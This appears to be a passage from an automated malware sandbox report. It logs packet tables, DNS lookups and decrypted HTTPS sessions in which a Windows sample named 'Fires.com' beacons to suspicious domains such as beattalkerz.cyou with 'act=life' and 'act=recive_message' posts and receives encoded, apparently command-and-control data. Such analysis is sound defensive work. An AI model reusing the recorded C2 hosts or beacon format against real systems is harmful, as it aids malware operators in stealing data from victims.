Jan 7, 2025 14:51:49.736027002 CET	49739	443	192.168.2.4	104.21.25.52
Jan 7, 2025 14:51:49.736033916 CET	443	49739	104.21.25.52	192.168.2.4
Jan 7, 2025 14:51:50.401814938 CET	443	49739	104.21.25.52	192.168.2.4
Jan 7, 2025 14:51:50.401899099 CET	443	49739	104.21.25.52	192.168.2.4
Jan 7, 2025 14:51:50.402026892 CET	49739	443	192.168.2.4	104.21.25.52
Jan 7, 2025 14:51:50.402096033 CET	49739	443	192.168.2.4	104.21.25.52
Jan 7, 2025 14:51:50.402111053 CET	443	49739	104.21.25.52	192.168.2.4
Jan 7, 2025 14:51:50.548810959 CET	49740	443	192.168.2.4	104.21.25.52
Jan 7, 2025 14:51:50.548844099 CET	443	49740	104.21.25.52	192.168.2.4
Jan 7, 2025 14:51:50.548923016 CET	49740	443	192.168.2.4	104.21.25.52
Jan 7, 2025 14:51:50.549228907 CET	49740	443	192.168.2.4	104.21.25.52
Jan 7, 2025 14:51:50.549245119 CET	443	49740	104.21.25.52	192.168.2.4
Jan 7, 2025 14:51:51.050390959 CET	443	49740	104.21.25.52	192.168.2.4
Jan 7, 2025 14:51:51.050486088 CET	49740	443	192.168.2.4	104.21.25.52
Jan 7, 2025 14:51:51.051758051 CET	49740	443	192.168.2.4	104.21.25.52
Jan 7, 2025 14:51:51.051773071 CET	443	49740	104.21.25.52	192.168.2.4
Jan 7, 2025 14:51:51.052021980 CET	443	49740	104.21.25.52	192.168.2.4
Jan 7, 2025 14:51:51.053220034 CET	49740	443	192.168.2.4	104.21.25.52
Jan 7, 2025 14:51:51.053375006 CET	49740	443	192.168.2.4	104.21.25.52
Jan 7, 2025 14:51:51.053400993 CET	443	49740	104.21.25.52	192.168.2.4
Jan 7, 2025 14:51:51.549578905 CET	443	49740	104.21.25.52	192.168.2.4
Jan 7, 2025 14:51:51.549669981 CET	443	49740	104.21.25.52	192.168.2.4
Jan 7, 2025 14:51:51.549750090 CET	49740	443	192.168.2.4	104.21.25.52
Jan 7, 2025 14:51:51.549963951 CET	49740	443	192.168.2.4	104.21.25.52
Jan 7, 2025 14:51:51.549984932 CET	443	49740	104.21.25.52	192.168.2.4
Jan 7, 2025 14:51:51.761095047 CET	49741	443	192.168.2.4	104.21.25.52
Jan 7, 2025 14:51:51.761157036 CET	443	49741	104.21.25.52	192.168.2.4
Jan 7, 2025 14:51:51.761234999 CET	49741	443	192.168.2.4	104.21.25.52
Jan 7, 2025 14:51:51.761600018 CET	49741	443	192.168.2.4	104.21.25.52
Jan 7, 2025 14:51:51.761619091 CET	443	49741	104.21.25.52	192.168.2.4
Jan 7, 2025 14:51:52.237935066 CET	443	49741	104.21.25.52	192.168.2.4
Jan 7, 2025 14:51:52.238123894 CET	49741	443	192.168.2.4	104.21.25.52
Jan 7, 2025 14:51:52.239352942 CET	49741	443	192.168.2.4	104.21.25.52
Jan 7, 2025 14:51:52.239367008 CET	443	49741	104.21.25.52	192.168.2.4
Jan 7, 2025 14:51:52.239603043 CET	443	49741	104.21.25.52	192.168.2.4
Jan 7, 2025 14:51:52.240715027 CET	49741	443	192.168.2.4	104.21.25.52
Jan 7, 2025 14:51:52.240834951 CET	49741	443	192.168.2.4	104.21.25.52
Jan 7, 2025 14:51:52.240868092 CET	443	49741	104.21.25.52	192.168.2.4
Jan 7, 2025 14:51:52.240955114 CET	49741	443	192.168.2.4	104.21.25.52
Jan 7, 2025 14:51:52.240963936 CET	443	49741	104.21.25.52	192.168.2.4
Jan 7, 2025 14:51:53.167670965 CET	443	49741	104.21.25.52	192.168.2.4
Jan 7, 2025 14:51:53.167771101 CET	443	49741	104.21.25.52	192.168.2.4
Jan 7, 2025 14:51:53.167820930 CET	49741	443	192.168.2.4	104.21.25.52
Jan 7, 2025 14:51:53.167980909 CET	49741	443	192.168.2.4	104.21.25.52
Jan 7, 2025 14:51:53.168004990 CET	443	49741	104.21.25.52	192.168.2.4
Jan 7, 2025 14:51:53.316714048 CET	49742	443	192.168.2.4	104.21.25.52
Jan 7, 2025 14:51:53.316782951 CET	443	49742	104.21.25.52	192.168.2.4
Jan 7, 2025 14:51:53.316857100 CET	49742	443	192.168.2.4	104.21.25.52
Jan 7, 2025 14:51:53.317123890 CET	49742	443	192.168.2.4	104.21.25.52
Jan 7, 2025 14:51:53.317137003 CET	443	49742	104.21.25.52	192.168.2.4
Jan 7, 2025 14:51:53.801409960 CET	443	49742	104.21.25.52	192.168.2.4
Jan 7, 2025 14:51:53.801479101 CET	49742	443	192.168.2.4	104.21.25.52
Jan 7, 2025 14:51:53.802664042 CET	49742	443	192.168.2.4	104.21.25.52
Jan 7, 2025 14:51:53.802675009 CET	443	49742	104.21.25.52	192.168.2.4
Jan 7, 2025 14:51:53.802917004 CET	443	49742	104.21.25.52	192.168.2.4
Jan 7, 2025 14:51:53.804095030 CET	49742	443	192.168.2.4	104.21.25.52
Jan 7, 2025 14:51:53.804187059 CET	49742	443	192.168.2.4	104.21.25.52
Jan 7, 2025 14:51:53.804192066 CET	443	49742	104.21.25.52	192.168.2.4
Jan 7, 2025 14:51:54.254762888 CET	443	49742	104.21.25.52	192.168.2.4
Jan 7, 2025 14:51:54.254854918 CET	443	49742	104.21.25.52	192.168.2.4
Jan 7, 2025 14:51:54.254966974 CET	49742	443	192.168.2.4	104.21.25.52
Jan 7, 2025 14:51:54.255079985 CET	49742	443	192.168.2.4	104.21.25.52
Jan 7, 2025 14:51:54.255095005 CET	443	49742	104.21.25.52	192.168.2.4
Jan 7, 2025 14:51:54.343058109 CET	49743	443	192.168.2.4	104.21.25.52
Jan 7, 2025 14:51:54.343099117 CET	443	49743	104.21.25.52	192.168.2.4
Jan 7, 2025 14:51:54.343168974 CET	49743	443	192.168.2.4	104.21.25.52
Jan 7, 2025 14:51:54.343427896 CET	49743	443	192.168.2.4	104.21.25.52
Jan 7, 2025 14:51:54.343441963 CET	443	49743	104.21.25.52	192.168.2.4
Jan 7, 2025 14:51:54.808393002 CET	443	49743	104.21.25.52	192.168.2.4
Jan 7, 2025 14:51:54.808456898 CET	49743	443	192.168.2.4	104.21.25.52
Jan 7, 2025 14:51:54.809926987 CET	49743	443	192.168.2.4	104.21.25.52
Jan 7, 2025 14:51:54.809938908 CET	443	49743	104.21.25.52	192.168.2.4
Jan 7, 2025 14:51:54.810179949 CET	443	49743	104.21.25.52	192.168.2.4
Jan 7, 2025 14:51:54.811280012 CET	49743	443	192.168.2.4	104.21.25.52
Jan 7, 2025 14:51:54.811414957 CET	49743	443	192.168.2.4	104.21.25.52
Jan 7, 2025 14:51:54.811419964 CET	443	49743	104.21.25.52	192.168.2.4
Jan 7, 2025 14:51:55.398027897 CET	443	49743	104.21.25.52	192.168.2.4
Jan 7, 2025 14:51:55.398123980 CET	443	49743	104.21.25.52	192.168.2.4
Jan 7, 2025 14:51:55.398180962 CET	49743	443	192.168.2.4	104.21.25.52
Jan 7, 2025 14:51:55.398372889 CET	49743	443	192.168.2.4	104.21.25.52
Jan 7, 2025 14:51:55.398396015 CET	443	49743	104.21.25.52	192.168.2.4
Jan 7, 2025 14:51:55.401108027 CET	49744	443	192.168.2.4	104.21.25.52
Jan 7, 2025 14:51:55.401159048 CET	443	49744	104.21.25.52	192.168.2.4
Jan 7, 2025 14:51:55.401232004 CET	49744	443	192.168.2.4	104.21.25.52
Jan 7, 2025 14:51:55.401503086 CET	49744	443	192.168.2.4	104.21.25.52
Jan 7, 2025 14:51:55.401520967 CET	443	49744	104.21.25.52	192.168.2.4
Jan 7, 2025 14:51:55.858875036 CET	443	49744	104.21.25.52	192.168.2.4
Jan 7, 2025 14:51:55.858952045 CET	49744	443	192.168.2.4	104.21.25.52
Jan 7, 2025 14:51:55.860122919 CET	49744	443	192.168.2.4	104.21.25.52
Jan 7, 2025 14:51:55.860133886 CET	443	49744	104.21.25.52	192.168.2.4
Jan 7, 2025 14:51:55.860364914 CET	443	49744	104.21.25.52	192.168.2.4
Jan 7, 2025 14:51:55.861541986 CET	49744	443	192.168.2.4	104.21.25.52
Jan 7, 2025 14:51:55.861573935 CET	49744	443	192.168.2.4	104.21.25.52
Jan 7, 2025 14:51:55.861604929 CET	443	49744	104.21.25.52	192.168.2.4
Jan 7, 2025 14:51:56.592668056 CET	443	49744	104.21.25.52	192.168.2.4
Jan 7, 2025 14:51:56.592762947 CET	443	49744	104.21.25.52	192.168.2.4
Jan 7, 2025 14:51:56.592813969 CET	49744	443	192.168.2.4	104.21.25.52
Jan 7, 2025 14:51:56.593004942 CET	49744	443	192.168.2.4	104.21.25.52
Jan 7, 2025 14:51:56.593024015 CET	443	49744	104.21.25.52	192.168.2.4
Jan 7, 2025 14:51:56.593034029 CET	49744	443	192.168.2.4	104.21.25.52
Jan 7, 2025 14:51:56.593040943 CET	443	49744	104.21.25.52	192.168.2.4
Jan 7, 2025 14:51:56.709774017 CET	49745	443	192.168.2.4	185.161.251.21
Jan 7, 2025 14:51:56.709810972 CET	443	49745	185.161.251.21	192.168.2.4
Jan 7, 2025 14:51:56.709943056 CET	49745	443	192.168.2.4	185.161.251.21
Jan 7, 2025 14:51:56.710794926 CET	49745	443	192.168.2.4	185.161.251.21
Jan 7, 2025 14:51:56.710810900 CET	443	49745	185.161.251.21	192.168.2.4
Jan 7, 2025 14:51:57.472354889 CET	443	49745	185.161.251.21	192.168.2.4
Jan 7, 2025 14:51:57.472449064 CET	49745	443	192.168.2.4	185.161.251.21
Jan 7, 2025 14:51:57.473851919 CET	49745	443	192.168.2.4	185.161.251.21
Jan 7, 2025 14:51:57.473859072 CET	443	49745	185.161.251.21	192.168.2.4
Jan 7, 2025 14:51:57.474195957 CET	443	49745	185.161.251.21	192.168.2.4
Jan 7, 2025 14:51:57.475240946 CET	49745	443	192.168.2.4	185.161.251.21
Jan 7, 2025 14:51:57.519328117 CET	443	49745	185.161.251.21	192.168.2.4
Jan 7, 2025 14:51:57.742101908 CET	443	49745	185.161.251.21	192.168.2.4
Jan 7, 2025 14:51:57.742168903 CET	443	49745	185.161.251.21	192.168.2.4
Jan 7, 2025 14:51:57.742223024 CET	49745	443	192.168.2.4	185.161.251.21
Jan 7, 2025 14:51:57.742907047 CET	49745	443	192.168.2.4	185.161.251.21
Jan 7, 2025 14:51:57.742923021 CET	443	49745	185.161.251.21	192.168.2.4
Jan 7, 2025 14:51:57.742935896 CET	49745	443	192.168.2.4	185.161.251.21
Jan 7, 2025 14:51:57.742943048 CET	443	49745	185.161.251.21	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 7, 2025 14:51:07.682676077 CET	58281	53	192.168.2.4	1.1.1.1
Jan 7, 2025 14:51:07.698590040 CET	53	58281	1.1.1.1	192.168.2.4
Jan 7, 2025 14:51:46.964596987 CET	60768	53	192.168.2.4	1.1.1.1
Jan 7, 2025 14:51:46.981292009 CET	53	60768	1.1.1.1	192.168.2.4
Jan 7, 2025 14:51:56.594641924 CET	60863	53	192.168.2.4	1.1.1.1
Jan 7, 2025 14:51:56.701550007 CET	53	60863	1.1.1.1	192.168.2.4
Jan 7, 2025 14:51:57.758212090 CET	64161	53	192.168.2.4	1.1.1.1
Jan 7, 2025 14:51:57.767455101 CET	53	64161	1.1.1.1	192.168.2.4
Jan 7, 2025 14:51:58.471736908 CET	50032	53	192.168.2.4	1.1.1.1
Jan 7, 2025 14:51:58.480324984 CET	53	50032	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 7, 2025 14:51:07.682676077 CET	192.168.2.4	1.1.1.1	0xebd	Standard query (0)	oTTuWZUCpWztYYToeMvyHdVgao.oTTuWZUCpWztYYToeMvyHdVgao	A (IP address)	IN (0x0001)	false
Jan 7, 2025 14:51:46.964596987 CET	192.168.2.4	1.1.1.1	0x1efc	Standard query (0)	beattalkerz.cyou	A (IP address)	IN (0x0001)	false
Jan 7, 2025 14:51:56.594641924 CET	192.168.2.4	1.1.1.1	0x5915	Standard query (0)	cegu.shop	A (IP address)	IN (0x0001)	false
Jan 7, 2025 14:51:57.758212090 CET	192.168.2.4	1.1.1.1	0x544c	Standard query (0)	klipvumisui.shop	A (IP address)	IN (0x0001)	false
Jan 7, 2025 14:51:58.471736908 CET	192.168.2.4	1.1.1.1	0x2082	Standard query (0)	dfgh.online	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 7, 2025 14:51:07.698590040 CET	1.1.1.1	192.168.2.4	0xebd	Name error (3)	oTTuWZUCpWztYYToeMvyHdVgao.oTTuWZUCpWztYYToeMvyHdVgao	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 14:51:46.981292009 CET	1.1.1.1	192.168.2.4	0x1efc	No error (0)	beattalkerz.cyou		104.21.25.52	A (IP address)	IN (0x0001)	false
Jan 7, 2025 14:51:46.981292009 CET	1.1.1.1	192.168.2.4	0x1efc	No error (0)	beattalkerz.cyou		172.67.222.183	A (IP address)	IN (0x0001)	false
Jan 7, 2025 14:51:56.701550007 CET	1.1.1.1	192.168.2.4	0x5915	No error (0)	cegu.shop		185.161.251.21	A (IP address)	IN (0x0001)	false
Jan 7, 2025 14:51:57.767455101 CET	1.1.1.1	192.168.2.4	0x544c	Name error (3)	klipvumisui.shop	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 14:51:58.480324984 CET	1.1.1.1	192.168.2.4	0x2082	Name error (3)	dfgh.online	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

beattalkerz.cyou

cegu.shop

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49737	104.21.25.52	443	6432	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com

Timestamp	Bytes transferred	Direction	Data
2025-01-07 13:51:47 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: beattalkerz.cyou
2025-01-07 13:51:47 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2025-01-07 13:51:47 UTC	1125	IN	HTTP/1.1 200 OK Date: Tue, 07 Jan 2025 13:51:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=fa0m2non99b6ciia3lcs1vg19a; expires=Sat, 03 May 2025 07:38:26 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qg%2F5eV205kRiH%2FuIzKt9pkoV1OUOpZyDTn%2FwiRimOdFihf96b8OmWnvpA8LXE9nXVLZtJ9AOLqVn8Itgt0j1n%2Fy7h%2B9Idl5BB4UtryLjDBHYHJt7anwHKAT2esGD2oCKGDpG"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fe46cb2b8314364-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1658&min_rtt=1648&rtt_var=638&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2839&recv_bytes=907&delivery_rate=1688837&cwnd=206&unsent_bytes=0&cid=f4a1ae9cfbc4c9e0&ts=516&x=0"
2025-01-07 13:51:47 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2025-01-07 13:51:47 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49738	104.21.25.52	443	6432	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com

Timestamp	Bytes transferred	Direction	Data
2025-01-07 13:51:48 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 77 Host: beattalkerz.cyou
2025-01-07 13:51:48 UTC	77	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 44 4e 4f 26 6a 3d 65 66 64 65 62 64 65 30 35 37 61 31 64 66 33 66 37 63 31 35 62 37 66 34 64 61 39 30 37 63 32 64 Data Ascii: act=recive_message&ver=4.0&lid=hRjzG3--DNO&j=efdebde057a1df3f7c15b7f4da907c2d
2025-01-07 13:51:48 UTC	1123	IN	HTTP/1.1 200 OK Date: Tue, 07 Jan 2025 13:51:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=pe9mt3nvthdb9v69qoo4jkugj7; expires=Sat, 03 May 2025 07:38:27 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cGZBR9W7YehmO8Lc%2FOxk5WcEuNcjRpfGcKQ35TKGtZHLzD0aFTgqsK5HanD7YzFXiiRbEHgbcoxeOOuFw6gOV3okV8rJrXnqhLAat1g3CUv%2B2iwYPsAbRINIuecoHw8%2BBRB%2B"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fe46cb89cc542d7-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1682&min_rtt=1675&rtt_var=643&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=977&delivery_rate=1682997&cwnd=245&unsent_bytes=0&cid=0437ecab3107ace4&ts=466&x=0"
2025-01-07 13:51:48 UTC	246	IN	Data Raw: 63 35 32 0d 0a 61 66 58 64 6c 35 76 49 76 78 58 32 4c 47 61 64 67 39 6d 4a 78 38 75 2b 52 46 59 2f 63 46 7a 46 63 58 47 65 6f 35 65 41 77 76 51 53 31 36 75 31 6f 66 79 54 4e 34 56 4a 52 4b 66 6c 75 4f 57 30 72 70 4a 6d 4e 31 74 53 5a 71 4d 51 48 65 33 47 75 36 4b 30 6d 55 76 50 75 2f 62 33 75 39 6f 35 31 45 6b 65 76 37 6d 43 38 75 57 75 30 47 5a 73 48 52 55 32 70 78 41 64 2f 4d 4c 38 37 37 4b 59 43 70 32 78 38 50 4f 74 33 48 47 58 51 41 76 34 35 72 7a 6f 72 61 58 58 4b 54 35 53 55 6e 44 6e 46 41 75 38 6d 62 58 4e 70 34 41 49 75 4c 7a 6b 38 4f 72 43 4f 59 30 4f 41 2f 4f 68 34 36 75 6d 72 74 77 6f 4d 46 73 62 4e 4b 30 5a 46 66 33 48 2f 66 43 72 6b 67 47 64 76 2f 50 79 70 39 56 6c 6d 6b 6f 4d 38 2b 43 32 36 4f 58 6e 6e 43 45 73 48 Data Ascii: c52afXdl5vIvxX2LGadg9mJx8u+RFY/cFzFcXGeo5eAwvQS16u1ofyTN4VJRKfluOW0rpJmN1tSZqMQHe3Gu6K0mUvPu/b3u9o51Ekev7mC8uWu0GZsHRU2pxAd/ML877KYCp2x8POt3HGXQAv45rzoraXXKT5SUnDnFAu8mbXNp4AIuLzk8OrCOY0OA/Oh46umrtwoMFsbNK0ZFf3H/fCrkgGdv/Pyp9VlmkoM8+C26OXnnCEsH
2025-01-07 13:51:48 UTC	1369	IN	Data Raw: 55 70 2b 39 43 45 51 37 64 44 67 37 37 43 51 53 34 6a 78 37 4c 6d 74 30 54 66 4d 44 67 7a 7a 37 37 37 6f 71 71 37 64 4a 69 5a 53 45 6a 32 76 47 78 66 32 7a 76 72 74 72 70 77 4d 6e 37 62 79 39 71 33 56 63 5a 74 4e 52 4c 47 68 76 50 50 6c 38 5a 77 47 4a 46 34 52 4b 71 6f 43 55 2b 4f 50 37 4b 4b 6e 6d 6b 76 50 2f 2f 50 33 71 39 42 33 68 6b 59 50 39 4f 53 70 34 4b 79 6b 30 53 59 35 56 78 30 39 70 78 51 5a 39 73 37 2f 35 71 32 62 44 5a 65 2f 74 62 66 71 32 6d 2f 55 46 6b 54 63 35 4b 76 73 71 62 2b 65 48 48 52 43 58 43 66 6e 46 42 2b 38 6d 62 58 71 70 5a 55 49 6e 4c 44 32 38 61 48 50 64 34 5a 49 43 66 72 7a 76 65 36 72 6f 39 38 30 50 6c 4d 55 50 61 34 59 47 76 6e 47 38 61 4c 75 31 67 79 50 2f 36 32 35 69 39 42 38 6d 45 51 54 2f 36 47 6b 70 62 7a 70 32 79 70 30 Data Ascii: Up+9CEQ7dDg77CQS4jx7Lmt0TfMDgzz777oqq7dJiZSEj2vGxf2zvrtrpwMn7by9q3VcZtNRLGhvPPl8ZwGJF4RKqoCU+OP7KKnmkvP//P3q9B3hkYP9OSp4Kyk0SY5Vx09pxQZ9s7/5q2bDZe/tbfq2m/UFkTc5Kvsqb+eHHRCXCfnFB+8mbXqpZUInLD28aHPd4ZICfrzve6ro980PlMUPa4YGvnG8aLu1gyP/625i9B8mEQT/6Gkpbzp2yp0
2025-01-07 13:51:48 UTC	1369	IN	Data Raw: 6f 66 55 37 4b 42 38 76 72 67 7a 6b 75 39 76 4f 48 36 6f 4a 39 43 6c 30 41 4b 2b 50 66 37 39 4f 75 77 6e 43 45 34 48 55 70 2b 71 68 49 62 2b 74 50 36 37 36 4f 59 42 5a 69 36 2b 76 47 71 33 58 71 52 53 67 2f 30 34 72 62 76 74 36 50 63 4c 6a 46 63 47 44 54 6e 58 56 50 37 32 62 57 36 34 4b 63 63 6e 50 33 41 2b 71 54 54 63 49 49 4f 47 37 48 34 2b 2b 79 70 36 59 52 6d 4f 56 55 58 4f 36 67 53 47 66 4c 45 2f 2b 36 6f 6d 41 69 46 73 50 48 35 70 74 56 39 6d 55 41 41 39 2b 69 77 34 4b 4f 70 33 53 78 30 45 31 49 35 76 31 4e 4c 76 50 58 79 37 71 32 5a 53 61 4b 38 2b 2f 65 74 79 7a 65 4c 41 42 32 2f 35 72 65 72 2f 65 6e 51 4c 7a 52 57 47 44 71 6e 46 42 37 35 77 76 4c 68 72 5a 45 42 6d 62 6a 78 39 61 50 51 63 5a 52 4a 41 50 72 7a 76 75 4b 70 70 5a 78 6f 64 46 6f 4b 66 Data Ascii: ofU7KB8vrgzku9vOH6oJ9Cl0AK+Pf79OuwnCE4HUp+qhIb+tP676OYBZi6+vGq3XqRSg/04rbvt6PcLjFcGDTnXVP72bW64KccnP3A+qTTcIIOG7H4++yp6YRmOVUXO6gSGfLE/+6omAiFsPH5ptV9mUAA9+iw4KOp3Sx0E1I5v1NLvPXy7q2ZSaK8+/etyzeLAB2/5rer/enQLzRWGDqnFB75wvLhrZEBmbjx9aPQcZRJAPrzvuKppZxodFoKf
2025-01-07 13:51:48 UTC	177	IN	Data Raw: 37 7a 62 57 36 34 4a 38 43 68 62 48 37 38 4b 66 62 66 35 4e 41 43 66 54 6e 73 4f 79 69 72 39 45 75 4f 56 67 52 50 36 4d 5a 41 66 2f 4b 2f 2b 2b 71 31 6b 58 58 75 4f 32 35 38 70 31 51 6d 47 63 55 35 50 4f 74 71 37 72 6e 78 57 59 7a 55 56 4a 6d 35 78 41 63 39 63 37 39 36 71 2b 5a 44 35 6d 35 38 2f 53 76 30 6e 32 47 52 67 72 79 36 72 54 67 74 36 6e 52 49 6a 68 5a 47 6a 57 74 55 31 32 38 78 75 32 69 2b 4e 59 2b 6d 72 44 31 2b 72 79 64 61 4e 70 58 52 50 6a 74 2b 37 50 6c 70 64 49 6d 4f 31 45 65 4e 61 38 53 48 2f 4c 47 38 4f 0d 0a Data Ascii: 7zbW64J8ChbH78Kfbf5NACfTnsOyir9EuOVgRP6MZAf/K/++q1kXXuO258p1QmGcU5POtq7rnxWYzUVJm5xAc9c796q+ZD5m58/Sv0n2GRgry6rTgt6nRIjhZGjWtU128xu2i+NY+mrD1+rydaNpXRPjt+7PlpdImO1EeNa8SH/LG8O
2025-01-07 13:51:48 UTC	1369	IN	Data Raw: 32 65 33 36 0d 0a 75 6f 6e 68 6d 57 75 2f 33 34 70 4e 4a 32 6b 45 73 42 2b 2b 61 2f 37 61 72 70 6b 6d 59 7a 52 56 4a 6d 35 7a 77 30 79 59 50 55 32 4f 43 4a 52 59 37 2f 38 76 58 71 68 54 65 59 54 51 6a 33 37 72 33 69 71 61 50 56 4c 54 68 57 46 6a 4b 75 46 68 58 39 78 50 44 6a 70 4a 6f 42 6b 62 7a 32 39 71 58 53 66 39 51 41 52 50 6a 35 2b 37 50 6c 6a 4d 73 74 4f 6c 74 53 49 65 6b 4b 55 2f 76 4e 74 62 72 67 6d 67 4b 52 75 66 44 31 71 39 74 2f 6b 55 59 41 2f 75 65 39 36 4b 71 74 32 53 63 37 57 52 34 77 72 52 49 53 38 4d 72 36 36 61 58 57 52 64 65 34 37 62 6e 79 6e 55 61 58 57 42 50 76 37 66 76 30 36 37 43 63 49 54 67 64 53 6e 36 6d 41 52 6e 32 7a 2f 44 74 70 5a 55 45 6b 4c 4c 7a 39 61 44 55 66 35 4a 42 44 65 33 69 74 2b 57 69 70 39 41 6f 4f 56 63 52 4d 2b 64 Data Ascii: 2e36uonhmWu/34pNJ2kEsB++a/7arpkmYzRVJm5zw0yYPU2OCJRY7/8vXqhTeYTQj37r3iqaPVLThWFjKuFhX9xPDjpJoBkbz29qXSf9QARPj5+7PljMstOltSIekKU/vNtbrgmgKRufD1q9t/kUYA/ue96Kqt2Sc7WR4wrRIS8Mr66aXWRde47bnynUaXWBPv7fv067CcITgdSn6mARn2z/DtpZUEkLLz9aDUf5JBDe3it+Wip9AoOVcRM+d
2025-01-07 13:51:48 UTC	1369	IN	Data Raw: 2f 4c 6c 71 35 34 41 6d 4c 6e 6e 39 61 54 50 63 6f 5a 63 52 4c 47 68 76 50 50 6c 38 5a 77 51 4d 30 30 43 50 65 55 69 42 66 2f 58 2f 75 2b 73 31 68 54 5a 70 72 58 2b 70 70 30 76 31 45 67 4c 39 75 4b 30 36 71 79 6c 30 53 4d 39 57 42 4d 34 6f 78 6b 5a 2f 4d 66 7a 34 36 57 63 43 4a 61 31 2f 50 36 69 32 6e 53 47 44 6b 71 2f 35 71 4f 72 2f 65 6e 31 49 53 5a 54 41 6e 36 34 58 51 71 38 78 76 6d 69 2b 4e 59 50 6e 62 44 78 2f 71 62 62 63 70 4a 44 42 66 44 67 75 2b 53 68 6f 74 55 67 4e 56 41 58 4d 36 4d 42 47 66 66 4f 2b 65 75 73 6d 30 76 5a 2f 2f 4c 68 36 6f 55 33 70 55 4d 4b 38 65 61 74 71 37 72 6e 78 57 59 7a 55 56 4a 6d 35 78 49 66 38 38 4c 36 34 61 4f 58 41 59 57 74 2b 66 43 69 32 48 75 66 51 41 4c 74 35 37 54 69 70 71 72 56 49 54 78 52 47 44 32 67 55 31 32 38 Data Ascii: /Llq54AmLnn9aTPcoZcRLGhvPPl8ZwQM00CPeUiBf/X/u+s1hTZprX+pp0v1EgL9uK06qyl0SM9WBM4oxkZ/Mfz46WcCJa1/P6i2nSGDkq/5qOr/en1ISZTAn64XQq8xvmi+NYPnbDx/qbbcpJDBfDgu+ShotUgNVAXM6MBGffO+eusm0vZ//Lh6oU3pUMK8eatq7rnxWYzUVJm5xIf88L64aOXAYWt+fCi2HufQALt57TipqrVITxRGD2gU128
2025-01-07 13:51:48 UTC	1369	IN	Data Raw: 65 52 46 4e 6d 6d 74 66 36 6d 6e 53 2f 55 53 41 33 35 35 72 33 6c 74 36 7a 61 4b 54 74 55 47 7a 71 76 45 42 50 34 78 66 4c 6e 6f 35 6f 41 6b 4c 7a 36 2f 61 50 54 66 70 73 4f 53 72 2f 6d 6f 36 76 39 36 66 30 39 4e 31 45 66 66 72 68 64 43 72 7a 47 2b 61 4c 34 31 67 65 5a 75 76 58 7a 72 4e 6c 79 6b 6b 51 42 2f 2b 71 34 35 4b 47 76 32 43 6b 30 56 68 73 2f 6f 52 59 5a 39 38 66 34 34 61 61 51 53 39 6e 2f 38 75 48 71 68 54 65 30 56 51 6e 7a 35 76 76 30 36 37 43 63 49 54 67 64 53 6e 36 73 48 78 66 37 77 66 6a 68 71 4a 4d 50 6e 62 72 31 38 62 6a 56 64 35 4e 63 46 76 2f 6f 76 75 65 6d 71 64 67 67 50 56 73 52 4f 75 64 64 55 2f 76 5a 74 62 72 67 75 77 65 51 6c 76 4c 69 36 73 49 35 6a 51 34 44 38 36 48 6a 71 36 53 69 31 69 6b 35 58 68 51 39 72 42 59 5a 2f 63 62 39 37 Data Ascii: 